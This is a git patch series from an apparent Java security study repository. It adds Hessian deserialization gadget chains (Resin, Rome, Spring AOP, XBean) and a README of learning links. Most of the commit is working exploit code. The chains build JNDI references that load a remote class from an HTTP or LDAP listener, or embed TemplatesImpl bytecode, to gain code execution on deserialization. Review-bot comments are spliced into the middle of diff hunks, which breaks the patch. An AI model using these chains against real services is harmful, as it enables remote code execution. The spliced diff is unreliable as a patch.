zS*;-8=-xPQE01Q{C84sPwzKppUSsrC{iGL5UF?}FDbsNzbHQGADI8M>kaEUa+MHPj zVm9iMvmluv%x@2wY>y{0SuNdppt^$NUG=Z9oJX^|(pi+%m6Ec`HYe6r`ZR4@t{K?N z8@>&Nb~I^Ob{IPGYdl}RAm5OgF0EY;Bb!rFw$_=zZ`wh0UEsm2A3gGrk|-AWPckWERqOW7eIgYY=Eu^$Kdc`5($;1>=mTn(Nc=2P(5KlVDr zO>X+|cCH$qz#y4*Jj9)zFyS2(0QZmJQRHF;kMo?9w2p8gW_~yp+?QOYf>QJ`yfeNR zID(@zGfrXY(*%xjH_%50@G7zLuGGqG%+$lmk=V)@HAsQPy>2VV@pv2zdk&LS*KKbo z7u!2d@hAAN;>1R3`d;QI@*s6RvyQ$ta>aZb{inu?h1?rZ+EA+p1$P5&XmcsUV8Wnp 
zFpL$4((U}gLn-fg{_y6uKb5e0GqtOI1-PFC#?7#SZZyuno~?pVjpHg*+DZR~yp#gZm@N?N|Sr*;Fw@_2WA z+{?AUG*Bz4ZQN75H*2}1Cdz-0eT(bZU((umTO0Sij{A!bwDDjY2c*&SiDWsAq@ZSyPSQM8q#^OlqdDz2s3o*A9J5eNbM+n$$#Kd+?VF%_(UBoW4&a|Ci&2btc@jr+L~bPT(Y-q-XoZ5xg5S1kjY&fmzaWm=}Y14{3QU()Cl^_0yMspvv0< zJ^C}|xKrp)o4(EvQ|o-qpT-&D=@wqadvTWiRimB9kbjdd4k}ns@RWjc8*8#jDCZTt WkFEG7f6FmZ3PYz~7r5`k#eV}v%ggit literal 0 HcmV?d00001 
diff --git a/shiro/shiroDeser/loadClass.class b/shiro/shiroDeser/loadClass.class new file mode 100644 index 0000000000000000000000000000000000000000..9e3e14363020ea5f3b60741026dbee9afc32d610 GIT binary patch literal 2848 zcmbtWS##4?6#j0!$Po$<6Ch?Ow1w6Q1hIrrVoJ#Z#l=Y|cA+NS6#2#$$dZxdU}&LR z+R&NyZ?w2v>3-#R^4R%{vE37vXI*44S^eD|F1EYhEU|Mm>PIDU|^A5$`> zF(dwF6Syehl8kq8SwR*d@-eEoWGKzFuA8 zPC;8TNs`Rjx@KP2978+@!l+j&hOwSt|8_KmPG%<=rvJYa4D!W>&TGOkS3-&5=l{k-PtU_Nl)S1sTbP?_ z7;ctW)I8hCY-;o}+@0POrPt9d@=h^KZEC)m6AX!Sx*61@NXc=A-ML%Zil$Q0lvTgV za#U`VY=*wYX;GS;?Y!q0R+)B$>3HjQnqf~!#o@~)*FANPdlkDBs7^2phIBS+S)iO@ z*csYtXO=7n@}8#Op3`c6KTvB?=JR&l(fK7qG|kp_UmO!IDtHA4Bya`GC@ZMIAn3eN zt(iP4nn9F|?HuzO9>ezMW0G)7!EKllstPRF0<6Zs1{k2=4jfv`5?loy?n-DVxQF|M z-@yq{M?G8O%hcn(jQagKEeW41_yUs(9^j#bFBN=+ue+RDSh__dD);<`qBGT{9@-+C7AKZrtIJds>Q&9F(9nz! z5J9Td9JQH%NOCF}F-F>axC*+YOj>6WpT$R zOgOu5gU68Vp+K1e9`?(t#~!`NNS0SkcTnUsx7lWW(5j z$HYP0uvYBbl&iC02V4C}Z_rMVfhdd;h^YN7em85mo<^x<=q~oQ(zY56Q_r7q)I>VR ztJp{1DdHCe6T^)D57N^qy3-g!Z1f4(V_Ni)Dj?Gx7$D`Xc#T#{O9`*z5Ir#*#v7z@ zkk;?e6%n$IaokrP^bHTTHUmRp`X1FlTIr7Oe~rh{sV)P@l?Et)Qw+|xH8(r-p4*Ot5~D&yojHO2}%MmOs=Ld zMAH4(OC0UP1g#2`$D0(;LrTOdQL#oAkBFWhDM=z}*N`B)2RKPt23gmL`*Av9Kgz`Y zX(DNizA#l Date: Sun, 23 Nov 2025 13:50:14 +0800 Subject: [PATCH 13/16] update: Hessian --- README.md | 33 ++- hessian/.gitignore | 38 ++++ hessian/.idea/.gitignore | 8 + hessian/.idea/encodings.xml | 7 + hessian/.idea/misc.xml | 14 ++ hessian/.idea/uiDesigner.xml | 124 +++++++++++ hessian/.idea/vcs.xml | 6 + hessian/Hessian.bin | Bin 0 -> 8192 bytes hessian/pom.xml | 81 +++++++ .../src/main/java/com/test/HessianTest.java | 52 +++++ .../java/com/test/client/HessianClient.java | 15 ++ .../java/com/test/gadget/ResinGadget.java | 58 +++++ .../main/java/com/test/gadget/RomeBased.java | 71 +++++++ .../java/com/test/gadget/SpringBased.java | 82 +++++++ .../java/com/test/gadget/XBeanGadget.java | 38 ++++ .../AudioFileFormat2toString.java | 54 +++++ .../ConcurrentHashMap2equals.java | 59 ++++++ 
.../blackhat2025/XStringFSB2toString.java | 92 ++++++++ .../src/main/java/com/test/gadget/tmp.java | 156 ++++++++++++++ .../src/main/java/com/test/gadget/tmp1.java | 27 +++ .../test/gadget/toStringBased/BCELClass.java | 10 + .../toStringBased/HashTableEquals_get.java | 37 ++++ .../MimeTypeParameterList_MethodUtil.java | 36 ++++ ...eParameterList_ProxyLazyValue_Sysload.java | 57 +++++ .../test/gadget/toStringBased/PKCS9_BCEL.java | 38 ++++ .../src/main/java/com/test/pojo/Person.java | 29 +++ .../com/test/server/HessianServiceImpl.java | 13 ++ .../main/java/com/test/server/Service.java | 5 + hessian/src/main/java/tools/ClassByteGen.java | 29 +++ hessian/src/main/java/tools/HessianTools.java | 66 ++++++ hessian/src/main/java/tools/IOTools.java | 12 ++ .../java/tools/InvocationHandlerImpl.java | 19 ++ hessian/src/main/java/tools/Payload.java | 10 + hessian/src/main/java/tools/ReflectTools.java | 200 ++++++++++++++++++ hessian/src/main/java/tools/TemplatesGen.java | 34 +++ hessian/src/main/java/tools/UnsafeTools.java | 15 ++ .../java/tools/sinkClass/ToStringClass.java | 15 ++ 37 files changed, 1635 insertions(+), 5 deletions(-) create mode 100644 hessian/.gitignore create mode 100644 hessian/.idea/.gitignore create mode 100644 hessian/.idea/encodings.xml create mode 100644 hessian/.idea/misc.xml create mode 100644 hessian/.idea/uiDesigner.xml create mode 100644 hessian/.idea/vcs.xml create mode 100644 hessian/Hessian.bin create mode 100644 hessian/pom.xml create mode 100644 hessian/src/main/java/com/test/HessianTest.java create mode 100644 hessian/src/main/java/com/test/client/HessianClient.java create mode 100644 hessian/src/main/java/com/test/gadget/ResinGadget.java create mode 100644 hessian/src/main/java/com/test/gadget/RomeBased.java create mode 100644 hessian/src/main/java/com/test/gadget/SpringBased.java create mode 100644 hessian/src/main/java/com/test/gadget/XBeanGadget.java create mode 100644 
hessian/src/main/java/com/test/gadget/blackhat2025/AudioFileFormat2toString.java create mode 100644 hessian/src/main/java/com/test/gadget/blackhat2025/ConcurrentHashMap2equals.java create mode 100644 hessian/src/main/java/com/test/gadget/blackhat2025/XStringFSB2toString.java create mode 100644 hessian/src/main/java/com/test/gadget/tmp.java create mode 100644 hessian/src/main/java/com/test/gadget/tmp1.java create mode 100644 hessian/src/main/java/com/test/gadget/toStringBased/BCELClass.java create mode 100644 hessian/src/main/java/com/test/gadget/toStringBased/HashTableEquals_get.java create mode 100644 hessian/src/main/java/com/test/gadget/toStringBased/MimeTypeParameterList_MethodUtil.java create mode 100644 hessian/src/main/java/com/test/gadget/toStringBased/MimeTypeParameterList_ProxyLazyValue_Sysload.java create mode 100644 hessian/src/main/java/com/test/gadget/toStringBased/PKCS9_BCEL.java create mode 100644 hessian/src/main/java/com/test/pojo/Person.java create mode 100644 hessian/src/main/java/com/test/server/HessianServiceImpl.java create mode 100644 hessian/src/main/java/com/test/server/Service.java create mode 100644 hessian/src/main/java/tools/ClassByteGen.java create mode 100644 hessian/src/main/java/tools/HessianTools.java create mode 100644 hessian/src/main/java/tools/IOTools.java create mode 100644 hessian/src/main/java/tools/InvocationHandlerImpl.java create mode 100644 hessian/src/main/java/tools/Payload.java create mode 100644 hessian/src/main/java/tools/ReflectTools.java create mode 100644 hessian/src/main/java/tools/TemplatesGen.java create mode 100644 hessian/src/main/java/tools/UnsafeTools.java create mode 100644 hessian/src/main/java/tools/sinkClass/ToStringClass.java diff --git a/README.md b/README.md index 190e49d..2fa4a02 100644 --- a/README.md +++ b/README.md @@ -16,6 +16,7 @@ - [高版本jdk下的链子](#高版本jdk下的链子) - [表达式+SSTI](#表达式+SSTI) - [RASP](#RASP) +- [中间件相关](#中间件相关) - [Spring系列](#Spring系列) - [工具开发/二开](#devTools) - [代码审计](#CodeAudit) 
@@ -96,9 +97,7 @@ ### XXE -[XXE外部实体注入漏洞的测试和修复——Java_xxe漏洞的两种修复方法-CSDN博客](https://blog.csdn.net/jian876601394/article/details/107610681) 列举了很多漏洞函数 - -[Java XXE漏洞原理研究 - 郑瀚 - 博客园](https://www.cnblogs.com/LittleHann/p/17776458.html) +[XXE整理 | 1diot9's Blog](https://1diot9.github.io/2025/11/18/XXE整理/) 参考的文章记得看 [一篇文章带你深入理解漏洞之 XXE 漏洞-先知社区](https://xz.aliyun.com/news/2994) 虽然不针对Java,但是写的很完整 @@ -106,6 +105,8 @@ + +
# 代码 / jar包调试 @@ -156,13 +157,35 @@ CC链是Java反序列化的开始,每个人都应该好好学习。 [java反序列化漏洞commons-collections3.2.1TransformedList触发transform-先知社区](https://xz.aliyun.com/news/13748) +[老链新看——CommonsCollections链](https://mp.weixin.qq.com/s/zNsTKVumW-wa91Eb63WVZA) +
## hessian -[Java安全学习——Hessian反序列化漏洞 - 枫のBlog](https://goodapple.top/archives/1193) +[Hessian反序列化原理到武器化利用 - FreeBuf网络安全行业门户](https://www.freebuf.com/articles/web/424308.html) 简要原理+常规链子 + +[超详细解析Hessian利用链-先知社区](https://xz.aliyun.com/news/13039) 常规链子 + +[漏洞篇 - Hessian 反序列化详解 - 妙尽璇机](https://changeyourway.github.io/2025/02/20/Java 安全/漏洞篇-Hessian反序列化/) 常规链子 + +[Java安全学习——Hessian反序列化漏洞 - 枫のBlog](https://goodapple.top/archives/1193) 原理+Apache Dubbo + +[0CTF/TCTF 2022 hessian-onlyJdk | Bmth's blog](http://www.bmth666.cn/2023/02/07/0CTF-TCTF-2022-hessian-onlyJdk/index.html) only-jdk链 + +[0ctf2022 hessian-only-jdk writeup jdk原生链-先知社区](https://xz.aliyun.com/news/11178) tabby挖掘 + +[Hessian 反序列化新链分析与坑点 | zoiltin's Blog](https://zoiltin.github.io/posts/hessian反序列化新链分析与坑点/) 新链 + +[从2025blackhat-jdd hessian反序列化jdk原生新链开始学习链子构造-先知社区](https://xz.aliyun.com/news/18935) 新链 + +[Hessian反序列化流程及漏洞浅析-先知社区](https://xz.aliyun.com/news/17603) + +[基础篇 - Hessian 协议详解 - 妙尽璇机](https://changeyourway.github.io/2024/11/13/Java 安全/基础篇-Hessian协议详解/) + +[Hessian 反序列化漏洞 · 攻击Java Web应用-Java Web安全\]](https://www.javasec.org/java-vuls/Hessian.html) -[Hessian 反序列化知一二 | 素十八](https://su18.org/post/hessian/) +[Hessian 反序列化知一二 | 素十八](https://su18.org/post/hessian/)
diff --git a/hessian/.gitignore b/hessian/.gitignore new file mode 100644 index 0000000..5ff6309 --- /dev/null +++ b/hessian/.gitignore @@ -0,0 +1,38 @@ +target/ +!.mvn/wrapper/maven-wrapper.jar +!**/src/main/**/target/ +!**/src/test/**/target/ + +### IntelliJ IDEA ### +.idea/modules.xml +.idea/jarRepositories.xml +.idea/compiler.xml +.idea/libraries/ +*.iws +*.iml +*.ipr + +### Eclipse ### +.apt_generated +.classpath +.factorypath +.project +.settings +.springBeans +.sts4-cache + +### NetBeans ### +/nbproject/private/ +/nbbuild/ +/dist/ +/nbdist/ +/.nb-gradle/ +build/ +!**/src/main/**/build/ +!**/src/test/**/build/ + +### VS Code ### +.vscode/ + +### Mac OS ### +.DS_Store \ No newline at end of file diff --git a/hessian/.idea/.gitignore b/hessian/.idea/.gitignore new file mode 100644 index 0000000..35410ca --- /dev/null +++ b/hessian/.idea/.gitignore @@ -0,0 +1,8 @@ +# 默认忽略的文件 +/shelf/ +/workspace.xml +# 基于编辑器的 HTTP 客户端请求 +/httpRequests/ +# Datasource local storage ignored files +/dataSources/ +/dataSources.local.xml diff --git a/hessian/.idea/encodings.xml b/hessian/.idea/encodings.xml new file mode 100644 index 0000000..aa00ffa --- /dev/null +++ b/hessian/.idea/encodings.xml @@ -0,0 +1,7 @@ + + + + + + + \ No newline at end of file diff --git a/hessian/.idea/misc.xml b/hessian/.idea/misc.xml new file mode 100644 index 0000000..8345e46 --- /dev/null +++ b/hessian/.idea/misc.xml @@ -0,0 +1,14 @@ + + + + + + + + + + \ No newline at end of file diff --git a/hessian/.idea/uiDesigner.xml b/hessian/.idea/uiDesigner.xml new file mode 100644 index 0000000..2b63946 --- /dev/null +++ b/hessian/.idea/uiDesigner.xml @@ -0,0 +1,124 @@ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + \ No newline at end of file 
diff --git a/hessian/.idea/vcs.xml b/hessian/.idea/vcs.xml new file mode 100644 index 0000000..6c0b863 --- /dev/null +++ b/hessian/.idea/vcs.xml @@ -0,0 +1,6 @@ + + + + + + \ No newline at end of file diff --git a/hessian/Hessian.bin b/hessian/Hessian.bin new file mode 100644 index 0000000000000000000000000000000000000000..70bb29ef86ff940f9a0d2647ade6c5c3b007410c GIT binary patch literal 8192 zcmeIu%}&EG3JtJZaYr3xpzzm#ZD-!=U){PEvxwRI67QJX{*kCmLXv}^jvx#Eq;D& zCi96KvCkSIB&j;>qZN5XKmYKmYKmY MKm + + 4.0.0 + + com.rois + Hessian + 1.0-SNAPSHOT + + + 8 + 8 + UTF-8 + + + + + org.javassist + javassist + 3.30.2-GA + + + com.caucho + hessian + 4.0.60 + + + com.caucho + resin + 4.0.63 + + + org.apache.xbean + xbean-naming + 4.24 + + + javax.servlet + javax.servlet-api + 4.0.1 + + + javax.annotation + javax.annotation-api + 1.3.2 + + + + rome + rome + 1.0 + + + org.springframework.boot + spring-boot-starter-web + 2.7.18 + + + + + + + + + + + + + org.aspectj + aspectjweaver + 1.9.22.1 + + + com.alibaba + fastjson + 1.2.47 + + + + \ No newline at end of file diff --git a/hessian/src/main/java/com/test/HessianTest.java b/hessian/src/main/java/com/test/HessianTest.java new file mode 100644 index 0000000..13a6f04 --- /dev/null +++ b/hessian/src/main/java/com/test/HessianTest.java 
@@ -0,0 +1,52 @@
+package com.test;
+
+import com.caucho.hessian.io.Hessian2Input;
+import com.caucho.hessian.io.Hessian2Output;
+import com.caucho.hessian.io.HessianInput;
+import com.caucho.hessian.io.HessianOutput;
+import com.test.pojo.Person;
+
+import java.io.ByteArrayInputStream;
+import java.io.ByteArrayOutputStream;
+import java.io.IOException;
+
+public class HessianTest {
+ public static void main(String[] args) throws IOException {
+ Person baka = new Person(1, "baka");
+ byte[] bytes = hessianSer2bytes(baka);
+ Person deser = (Person) hessianDeser(bytes);
+ System.out.println(deser.getName());
+ }
+
+ public static byte[] hessian2Ser2bytes(Object obj) throws IOException {
+ ByteArrayOutputStream baos = new ByteArrayOutputStream();
+ Hessian2Output hessian2Output = new Hessian2Output(baos);
+ hessian2Output.writeObject(obj);
+ hessian2Output.close();
+ return baos.toByteArray();
+ }
+
+ public static Object hessian2Deser(byte[] bytes) throws IOException {
+ ByteArrayInputStream bais = new ByteArrayInputStream(bytes);
+ Hessian2Input hessian2Input = new Hessian2Input(bais);
+ Object o = hessian2Input.readObject();
+ hessian2Input.close();
+ return o;
+ }
+
+ public static byte[] hessianSer2bytes(Object obj) throws IOException {
+ ByteArrayOutputStream baos = new ByteArrayOutputStream();
+ HessianOutput hessianOutput = new HessianOutput(baos);
+ hessianOutput.writeObject(obj);
+ hessianOutput.close();
+ return baos.toByteArray();
+ }
+
+ public static Object hessianDeser(byte[] bytes) throws IOException {
+ ByteArrayInputStream bais = new ByteArrayInputStream(bytes);
+ HessianInput hessianInput = new HessianInput(bais);
+ Object o = hessianInput.readObject();
+ hessianInput.close();
+ return o;
+ }
+}
diff --git a/hessian/src/main/java/com/test/client/HessianClient.java b/hessian/src/main/java/com/test/client/HessianClient.java
new file mode 100644
index 0000000..c098b17
--- /dev/null
+++ b/hessian/src/main/java/com/test/client/HessianClient.java
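Review bot: `hessianDeser` and `hessian2Deser` hand the given bytes to `HessianInput`/`Hessian2Input` with the default `SerializerFactory`, so nothing restricts which classes the stream may instantiate, and nothing on the class marks this as a deliberate test-only setup; a header comment such as `// Test harness only: reads bytes with Hessian's default SerializerFactory (no class allow-list). A reader that ever sees untrusted input must install a restricted factory via setSerializerFactory(...) first.` would keep these helpers from being copied into real code. The same four helpers appear to exist again in `tools.HessianTools` (`ResinGadget` calls `HessianTools.hessian2Ser2bytes` and `HessianTools.hessian2Deser`), so this class could delegate to them instead of carrying a second copy. The `close()` calls are skipped when `writeObject`/`readObject` throws; that is harmless over byte arrays, but a `finally` would be needed if the helpers are reused on real streams.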
@@ -0,0 +1,15 @@
+package com.test.client;
+
+import com.caucho.hessian.client.HessianProxyFactory;
+import com.test.server.Service;
+
+import java.net.MalformedURLException;
+
+public class HessianClient {
+ public static void main(String[] args) throws MalformedURLException {
+ String url="http://localhost:8080/MyTomcat/hessian";
+ HessianProxyFactory factory=new HessianProxyFactory();
+ Service service=(Service) factory.create(Service.class, url);
+ System.out.println(service.getCurrentTime());
+ }
+}
diff --git a/hessian/src/main/java/com/test/gadget/ResinGadget.java b/hessian/src/main/java/com/test/gadget/ResinGadget.java
new file mode 100644
index 0000000..1017b51
--- /dev/null
+++ b/hessian/src/main/java/com/test/gadget/ResinGadget.java
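Review bot: The three assignments in `main` omit the spaces around `=` (`String url="..."`, `HessianProxyFactory factory=new ...`, `Service service=(Service) ...`), unlike the formatting used in `HessianTest` in the same commit; `String url = "http://localhost:8080/MyTomcat/hessian";`, `HessianProxyFactory factory = new HessianProxyFactory();` and `Service service = (Service) factory.create(Service.class, url);` would match. It is also worth a note that the proxy from `HessianProxyFactory` decodes the server's reply as Hessian, so, as far as I can tell, the client side carries the same class-instantiation risk as a server if `url` ever points at an endpoint the author does not control — `// NOTE: the proxy deserializes the server's response; keep url pointed at a trusted local service.` The `Service` interface and `getCurrentTime()` are defined outside this hunk.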
@@ -0,0 +1,58 @@ +package com.test.gadget; + +import com.caucho.hessian.io.Hessian2Input; +import com.caucho.hessian.io.Hessian2Output; +import com.caucho.hessian.io.SerializerFactory; +import com.caucho.naming.QName; +import com.sun.org.apache.xpath.internal.objects.XString; +import tools.HessianTools; +import tools.ReflectTools; +import tools.UnsafeTools; + +import javax.naming.CannotProceedException; +import javax.naming.Context; +import javax.naming.Reference; +import java.io.ByteArrayInputStream; +import java.io.ByteArrayOutputStream; +import java.lang.reflect.Constructor; +import java.lang.reflect.Field; +import java.lang.reflect.InvocationTargetException; +import java.util.HashMap; +import java.util.Hashtable; + +import static com.test.gadget.blackhat2025.XStringFSB2toString.unhash; + +public class ResinGadget { + public static void main(String[] args) throws Exception { + Object object = getObject(); + byte[] bytes = HessianTools.hessian2Ser2bytes(object); + HessianTools.hessian2Deser(bytes); + } + + public static Object getObject() throws Exception { + String refAddr = "http://127.0.0.1:8000/"; + String refClassName = "Calc"; + + Reference ref = new Reference(refClassName, refClassName, refAddr); + + Object cannotProceedException = Class.forName("javax.naming.CannotProceedException").getDeclaredConstructor().newInstance(); + ReflectTools.setFieldValue(cannotProceedException, "resolvedObj", ref); + + Class contiC = Class.forName("javax.naming.spi.ContinuationContext"); + Context continuationContext = (Context) UnsafeTools.getObjectByUnsafe(contiC); + ReflectTools.setFieldValue(continuationContext, "cpe", cannotProceedException); + ReflectTools.setFieldValue(continuationContext, "env", new Hashtable()); + + // 创建QName + QName qName = new QName(continuationContext, "aaa", "bbb"); + // 实现hash碰撞 + String str = unhash(qName.hashCode()); + // 创建Xtring + XString xString = new XString(str); + + // 创建HashMap + HashMap finalMap = ReflectTools.makeMap(qName, xString); 
+ + return finalMap; + } +} diff --git a/hessian/src/main/java/com/test/gadget/RomeBased.java b/hessian/src/main/java/com/test/gadget/RomeBased.java new file mode 100644 index 0000000..47189a0 --- /dev/null +++ b/hessian/src/main/java/com/test/gadget/RomeBased.java 
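Review bot: `getObject()` builds a JNDI `Reference` whose factory class `Calc` is fetched from `http://127.0.0.1:8000/`, and `main` immediately feeds the result back into `hessian2Deser`, so running the class performs that remote class load on the developer's own JVM; the chain is also silent on JDKs where remote codebase loading is disabled by default (8u191+/11.0.1+, governed by `com.sun.jndi.ldap.object.trustURLCodebase` if I recall the property correctly), so put that precondition in a comment above `getObject`. `refAddr` and `refClassName` are hard-coded; reading them from `args` with the current values as defaults would keep the listener address out of the source. `SerializerFactory`, `Hessian2Input`, `Hessian2Output`, `Constructor`, `Field`, `InvocationTargetException` and `CannotProceedException` are imported but unused, and `Class contiC` is a raw type where `Class<?> contiC` compiles identically. Static-importing `unhash` from a sibling gadget class (`blackhat2025.XStringFSB2toString`) couples two unrelated payloads; it belongs in `tools`.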
@@ -0,0 +1,71 @@ +package com.test.gadget; + +import com.sun.rowset.JdbcRowSetImpl; +import com.sun.syndication.feed.impl.EqualsBean; +import com.sun.syndication.feed.impl.ToStringBean; +import tools.HessianTools; +import tools.ReflectTools; +import tools.TemplatesGen; + +import javax.xml.transform.Templates; +import java.security.*; +import java.util.HashMap; + +public class RomeBased { + public static void main(String[] args) throws Exception { + rome2SignedObj(); + } + + public static void rome2Jndi() throws Exception { + JdbcRowSetImpl jdbcRowSet = new JdbcRowSetImpl(); + jdbcRowSet.setDataSourceName("ldap://127.0.0.1:50389/eae633"); + + ToStringBean toStringBean = new ToStringBean(JdbcRowSetImpl.class, jdbcRowSet); + EqualsBean equalsBean = new EqualsBean(ToStringBean.class, toStringBean); + HashMap hashMap = ReflectTools.makeMap(equalsBean, "any"); + + byte[] bytes = HessianTools.hessianSer2bytes(hashMap); + HessianTools.hessianDeser(bytes); + } + + // 二次反序列化 + // 会触发三次,因为ToStringBean.printProperty间接触发两次EqualsBean.hashCode + public static void rome2SignedObj() throws Exception { + Templates templates = TemplatesGen.getTemplates(null, "D:/1tmp/classes/CalcAbs.class"); + ToStringBean toStringBean = new ToStringBean(Templates.class, templates); + EqualsBean equalsBean = new EqualsBean(ToStringBean.class, toStringBean); + HashMap hashMap = ReflectTools.makeMap(equalsBean, "any"); + + // 初始化 SignedObject 所需的密钥和签名工具 + KeyPairGenerator keyPairGenerator = KeyPairGenerator.getInstance("DSA"); + keyPairGenerator.initialize(1024); + KeyPair keyPair = keyPairGenerator.genKeyPair(); + PrivateKey privateKey = keyPair.getPrivate(); + Signature signingEngine = Signature.getInstance("DSA"); + // 创建 SignedObject 对象,对 map 进行签名 + SignedObject signedObject = new SignedObject(hashMap, privateKey, signingEngine); + + + ToStringBean toStringBean2 = new ToStringBean(SignedObject.class, signedObject); + EqualsBean equalsBean2 = new EqualsBean(ToStringBean.class, toStringBean2); + 
HashMap hashMap2 = ReflectTools.makeMap(equalsBean2, "any"); + + byte[] bytes = HessianTools.hessianSer2bytes(hashMap2); + HessianTools.hessianDeser(bytes); + + + } + + + // 失败,因为hessian无法反序列化transit和static变量 + public static void rome2Templates() throws Exception { + Templates templates = TemplatesGen.getTemplates(null, "D:/1tmp/classes/Calc.class"); + ToStringBean toStringBean = new ToStringBean(Templates.class, templates); + EqualsBean equalsBean = new EqualsBean(ToStringBean.class, toStringBean); +// equalsBean.hashCode(); + HashMap hashMap = ReflectTools.makeMap(equalsBean, "any"); + + byte[] bytes = HessianTools.hessianSer2bytes(hashMap); + HessianTools.hessianDeser(bytes); + } +} diff --git a/hessian/src/main/java/com/test/gadget/SpringBased.java b/hessian/src/main/java/com/test/gadget/SpringBased.java new file mode 100644 index 0000000..6301a9b --- /dev/null +++ b/hessian/src/main/java/com/test/gadget/SpringBased.java 
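Review bot: Every builder here (`rome2Jndi`, `rome2SignedObj`, `rome2Templates`) ends by calling `HessianTools.hessianDeser(bytes)` on its own output, so `main` detonates the gadget on the building machine, with a Windows-only path (`D:/1tmp/classes/CalcAbs.class`) and a local LDAP listener (`ldap://127.0.0.1:50389/eae633`) baked in; returning the bytes from each builder and keeping the self-trigger only in `main` would separate payload generation from the test run, and the paths/URL should come from `args`. The explanation on `rome2Templates` is Chinese with a typo (`transit`); in English it should read `// Fails under Hessian: transient/static fields are not written, so TemplatesImpl arrives without the state its own readObject would restore`. That is also, as far as I can tell, why `rome2SignedObj` works — `SignedObject.getObject()` re-inflates the inner map with `ObjectInputStream`, which does honour `readObject` — and the comment that the chain fires three times via `ToStringBean.printProperty` is worth keeping, in English, next to it. `rome2SignedObj` uses DSA-1024 purely to satisfy `SignedObject`'s constructor; a note saying the key is throwaway would prevent anyone "fixing" the key size.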
@@ -0,0 +1,82 @@ +package com.test.gadget; + +import com.sun.org.apache.xpath.internal.objects.XString; +import org.springframework.aop.aspectj.AbstractAspectJAdvice; +import org.springframework.aop.aspectj.AspectJAroundAdvice; +import org.springframework.aop.aspectj.AspectJPointcutAdvisor; +import org.springframework.aop.aspectj.annotation.BeanFactoryAspectInstanceFactory; +import org.springframework.aop.support.DefaultBeanFactoryPointcutAdvisor; +import org.springframework.aop.support.DefaultPointcutAdvisor; +import org.springframework.aop.target.HotSwappableTargetSource; +import org.springframework.jndi.support.SimpleJndiBeanFactory; +import tools.HessianTools; +import tools.ReflectTools; +import tools.UnsafeTools; + +import java.util.HashMap; +import java.util.HashSet; +import java.util.Set; + +public class SpringBased { + public static void main(String[] args) throws Exception { + Object o = pointcutAdvisor(); + byte[] bytes = HessianTools.hessian2Ser2bytes(o); + HessianTools.hessian2Deser(bytes); + } + + public static Object advisorHolder() throws Exception { + String url = "ldap://127.0.0.1:50389/d64c0c"; + SimpleJndiBeanFactory simpleJndiBeanFactory = new SimpleJndiBeanFactory(); + Set set = new HashSet(); + set.add("any"); + + // 直接通过构造方法会提前执行 + BeanFactoryAspectInstanceFactory beanFactoryAspectInstanceFactory = (BeanFactoryAspectInstanceFactory) UnsafeTools.getObjectByUnsafe(BeanFactoryAspectInstanceFactory.class); + ReflectTools.setFinalField(beanFactoryAspectInstanceFactory, "beanFactory", simpleJndiBeanFactory); + ReflectTools.setFinalField(beanFactoryAspectInstanceFactory, "name", url); + + AbstractAspectJAdvice aspectJAroundAdvice = (AbstractAspectJAdvice) UnsafeTools.getObjectByUnsafe(AspectJAroundAdvice.class); + ReflectTools.setFieldValue(aspectJAroundAdvice, "aspectInstanceFactory", beanFactoryAspectInstanceFactory); + + AspectJPointcutAdvisor aspectJPointcutAdvisor = (AspectJPointcutAdvisor) 
UnsafeTools.getObjectByUnsafe(AspectJPointcutAdvisor.class); + ReflectTools.setFieldValue(aspectJPointcutAdvisor, "advice", aspectJAroundAdvice); + ReflectTools.setFieldValue(aspectJPointcutAdvisor, "order", null); + + Class aClass = Class.forName("org.springframework.aop.aspectj.autoproxy.AspectJAwareAdvisorAutoProxyCreator$PartiallyComparableAdvisorHolder"); + Object objectByUnsafe = UnsafeTools.getObjectByUnsafe(aClass); + ReflectTools.setFieldValue(objectByUnsafe, "advisor", aspectJPointcutAdvisor); + + Object xString = UnsafeTools.getObjectByUnsafe(XString.class); + HotSwappableTargetSource hotSwappableTargetSource = new HotSwappableTargetSource(xString); + HotSwappableTargetSource other = new HotSwappableTargetSource(objectByUnsafe); + + HashMap hashMap = ReflectTools.makeMap(other, hotSwappableTargetSource); + + + return hashMap; + } + + public static Object pointcutAdvisor() throws Exception { + String url = "ldap://127.0.0.1:50389/d64c0c"; + SimpleJndiBeanFactory simpleJndiBeanFactory = new SimpleJndiBeanFactory(); + Set set = new HashSet(); + set.add(url); + ReflectTools.setFieldValue(simpleJndiBeanFactory, "shareableResources", set); + + + + Object defaultBeanFactoryPointcutAdvisor = UnsafeTools.getObjectByUnsafe(DefaultBeanFactoryPointcutAdvisor.class); + ReflectTools.setFieldValue(defaultBeanFactoryPointcutAdvisor, "beanFactory", simpleJndiBeanFactory); + ReflectTools.setFieldValue(defaultBeanFactoryPointcutAdvisor, "adviceBeanName", url); + + // AbstractPointcutAdvisor的子类,且没实现equals方法的都行, AsyncAnnotationAdvisor\DefaultPointcutAdvisor + Object defaultPointcutAdvisor = UnsafeTools.getObjectByUnsafe(DefaultPointcutAdvisor.class); + HotSwappableTargetSource hotSwappableTargetSource = new HotSwappableTargetSource(defaultPointcutAdvisor); + HotSwappableTargetSource other = new HotSwappableTargetSource(defaultBeanFactoryPointcutAdvisor); + + HashMap hashMap = ReflectTools.makeMap(other, hotSwappableTargetSource); + + return hashMap; + } + +} 
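Review bot: In `advisorHolder` the pair `Set set = new HashSet(); set.add("any");` is dead code — `set` is never handed to `simpleJndiBeanFactory`, unlike `pointcutAdvisor`, which installs it as `shareableResources`; either wire it up the same way or delete the two lines. The LDAP URL `ldap://127.0.0.1:50389/d64c0c` is duplicated across both builders; a single `private static final String LDAP_URL` (or an `args` parameter) keeps the two variants in sync when the listener changes. Both variants ultimately make `SimpleJndiBeanFactory` perform an `InitialContext` lookup on that URL, so the same JDK `trustURLCodebase`/serialized-object preconditions as the other JNDI gadgets apply and deserve a one-line comment on each builder. `Set`/`HashMap` are raw types throughout; `Set<String>` and `HashMap<Object, Object>` cost nothing.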
diff --git a/hessian/src/main/java/com/test/gadget/XBeanGadget.java b/hessian/src/main/java/com/test/gadget/XBeanGadget.java
new file mode 100644
index 0000000..58f16a5
--- /dev/null
+++ b/hessian/src/main/java/com/test/gadget/XBeanGadget.java
@@ -0,0 +1,38 @@
+package com.test.gadget;
+
+import com.sun.org.apache.xpath.internal.objects.XString;
+import org.apache.xbean.naming.context.WritableContext;
+import org.springframework.aop.target.HotSwappableTargetSource;
+import tools.HessianTools;
